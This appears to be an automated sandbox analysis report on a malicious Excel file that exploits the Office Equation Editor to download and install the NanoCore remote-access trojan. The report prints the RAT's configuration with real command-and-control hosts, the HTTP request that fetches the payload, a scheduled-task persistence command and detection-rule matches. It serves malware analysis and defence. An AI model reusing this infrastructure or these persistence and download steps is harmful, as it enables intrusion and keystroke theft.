Loading ...

Play interactive tourEdit tour

Analysis Report Files Specification.xlsx

Overview

General Information

Sample Name:Files Specification.xlsx
Analysis ID:384530
MD5:3f313ed62b62d4b5eb276563ca6279b1
SHA1:ad59b8e880ac245254e71f174fc0b208c810cf6f
SHA256:175deb6bade5be1402da4fbb5d154e07ce7dba53f7a2a68fdf210aadb63683ff
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2400 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2488 cmdline: 'C:\Users\Public\vbc.exe' MD5: A74ECE32BC1B6DB38A2D379C7FC78D2C)
      • schtasks.exe (PID: 2244 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 2200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • smtpsvc.exe (PID: 1664 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe75:$x1: NanoCore.ClientPluginHost
    • 0xe8f:$x2: IClientNetworkHost
    00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe75:$x2: NanoCore.ClientPluginHost
    • 0x1261:$s3: PipeExists
    • 0x1136:$s4: PipeCreated
    • 0xeb0:$s5: IClientLoggingHost
    00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x2ab5:$a: NanoCore
      • 0x2b0e:$a: NanoCore
      • 0x2b4b:$a: NanoCore
      • 0x2bc4:$a: NanoCore
      • 0x1626f:$a: NanoCore
      • 0x16284:$a: NanoCore
      • 0x162b9:$a: NanoCore
      • 0x2ed3b:$a: NanoCore
      • 0x2ed50:$a: NanoCore
      • 0x2ed85:$a: NanoCore
      • 0x2b17:$b: ClientPlugin
      • 0x2b54:$b: ClientPlugin
      • 0x3452:$b: ClientPlugin
      • 0x345f:$b: ClientPlugin
      • 0x1602b:$b: ClientPlugin
      • 0x16046:$b: ClientPlugin
      • 0x16076:$b: ClientPlugin
      • 0x1628d:$b: ClientPlugin
      • 0x162c2:$b: ClientPlugin
      • 0x2eaf7:$b: ClientPlugin
      • 0x2eb12:$b: ClientPlugin
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.RegSvcs.exe.4b0000.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      7.2.RegSvcs.exe.4b0000.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      7.2.RegSvcs.exe.354fb0c.8.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xd9ad:$x1: NanoCore.ClientPluginHost
      • 0xd9da:$x2: IClientNetworkHost
      7.2.RegSvcs.exe.354fb0c.8.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xd9ad:$x2: NanoCore.ClientPluginHost
      • 0xea88:$s4: PipeCreated
      • 0xd9c7:$s5: IClientLoggingHost
      7.2.RegSvcs.exe.354fb0c.8.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 33 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 34.220.10.254, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2400, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2400, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exe
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2200, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2488, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp', ProcessId: 2244

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus detection for URL or domainShow sources
        Source: http://covid19vaccinations.hopto.org/loki.exeAvira URL Cloud: Label: malware
        Found malware configurationShow sources
        Source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
        Multi AV Scanner detection for domain / URLShow sources
        Source: 79.134.225.30Virustotal: Detection: 5%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exeReversingLabs: Detection: 16%
        Source: C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exeReversingLabs: Detection: 16%
        Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 16%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2488, type: MEMORY
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exeJoe Sandbox ML: detected
        Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exeJoe Sandbox ML: detected
        Source: 7.2.RegSvcs.exe.500000.4.unpackAvira: Label: TR/NanoCore.fadte
        Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2204591291.0000000001CE0000.00000002.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: smtpsvc.exe, smtpsvc.exe.7.dr
        Source: Binary string: Z089\mscorlib.pdbmeUIXaml, source: RegSvcs.exe, 00000007.00000002.2364831026.0000000000787000.00000004.00000020.sdmp
        Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB
        Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
        Source: global trafficDNS query: name: covid19vaccinations.hopto.org
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 34.220.10.254:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 34.220.10.254:80

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 79.134.225.30:1144
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 79.134.225.30:1144
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: nassiru1155.ddns.net
        Source: Malware configuration extractorURLs: 79.134.225.30
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 79.134.225.30:1144
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 09 Apr 2021 09:43:08 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16Last-Modified: Fri, 09 Apr 2021 07:13:49 GMTETag: "1c7800-5bf84e7cc6f70"Accept-Ranges: bytesContent-Length: 1865728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac fe 6f 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 15 00 00 a4 06 00 00 00 00 00 de f0 15 00 00 20 00 00 00 00 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 f0 15 00 57 00 00 00 00 20 16 00 74 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d0 15 00 00 20 00 00 00 d2 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 16 00 00 02 00 00 00 d4 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 74 a0 06 00 00 20 16 00 00 a2 06 00 00 d6 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f0 15 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 7f 14 00 b4 70 01 00 03 00 00 00 cf 00 00 06 44 ed 05 00 8c 92 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 1f 00 00 0a 02 03 7d 01 00 00 04 02 28 20 00 00 0a 6f 21 00 00 0a 7d 03 00 00 04 2a 00 06 2a 00 00 13 30 03 00 03 01 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 45 08 00 00 00 02 00 00 00 1d 00 00 00 38 00 00 00 5a 00 00 00 75 00 00 00 97 00 00 00 b2 00 00 00 cd 00 00 00 16 2a 02 15 7d 01 00 00 04 02 20 5d f9 34 53 7d 02 00 00 04 02 17 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 a6 bd 51 f9 7d 02 00 00 04 02 18 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 4b 6d da 95 61 7d 02 00 00 04 02 19 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 2c bc c2 c2 7d 02 00 00 04 02 1a 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 14 10 3d 87 61 7d 02 00 00 04 02 1b 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 94 13 e8 f4 7d 02 00 00 04 02 1c 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 22 47 f5 52 7d 02 00 00 04 02 1d 7d 01 00 00
        Source: Joe Sandbox ViewIP Address: 79.134.225.30 79.134.225.30
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
        Source: global trafficHTTP traffic detected: GET /loki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2302D74A.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /loki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: covid19vaccinations.hopto.org
        Source: vbc.exe, 00000004.00000002.2183115808.000000000BC20000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2366501562.0000000005320000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: vbc.exe, 00000004.00000002.2177066923.0000000002605000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: vbc.exe, 00000004.00000002.2183115808.000000000BC20000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2366501562.0000000005320000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
        Source: RegSvcs.exe, 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2488, type: MEMORY
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
